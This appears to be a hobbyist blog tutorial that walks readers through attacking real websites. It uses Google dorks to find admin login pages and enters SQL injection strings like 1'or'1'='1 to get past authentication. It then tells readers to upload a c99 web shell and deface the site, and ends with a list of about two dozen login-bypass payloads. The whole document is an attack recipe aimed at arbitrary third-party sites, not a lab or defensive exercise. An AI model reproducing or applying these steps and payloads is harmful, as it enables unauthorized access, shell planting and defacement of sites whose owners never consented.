Sql
injection can be done by using various tools like Acunetix, SQL helper, Havij. In one of my past tutorials I showed you how havij is used by the hackers to
scan a website for vulnerability and
then take advantage of the loop hole and gain access to the
website. There are various methods of this technique and In this
tutorial I will be describing a very basic and simple Structured Query Language
Injection (SQLi). Aside from this let me also tell that SQL injection
technique is widely used by hackers. I am of the perception that 70% of the hacks on websites are done with SQL injection. In this
tutorial we will come to know how to find the website’s admin panel using a
simple google dork and a SQL query to bypass the admin user name and password
and enter into the panel. When we enter into the admin panel what we have to do
is to find a file upload option and just upload a shell there like c99 shell
etc. and finally deface the same.
By entering these
dorks many of the sites will open up having /adminlogin.aspx in their URL.
Select any
website, you will get the admin panel of the said website.
Fill the details
as:
User: 1'or'1'='1
Password: 1'or'1'='1
Using the above
mentioned login details and you will enter into the admin panel of a
website.It will not work for all the websites but this is what is called a
basic sql injection?
Other injection
queries like this:
‘ or 1=1 –
1'or’1'=’1
admin’–
” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’='x
” or “x”=”x
‘) or (‘x’='x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’='a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
hi’ or ‘a’='a
hi’) or (‘a’='a
hi”) or (“a”=”)
Hope you enjoyed this
Please subscribe or give a
thumbs up if there is anything you want me to write or do a tutorial about
please send me an email
I am doing more useful tips
and tutorials everyday so please come by to see if there is anything new when I
get enough followers and views I will be giving out free stuff
No comments:
Post a Comment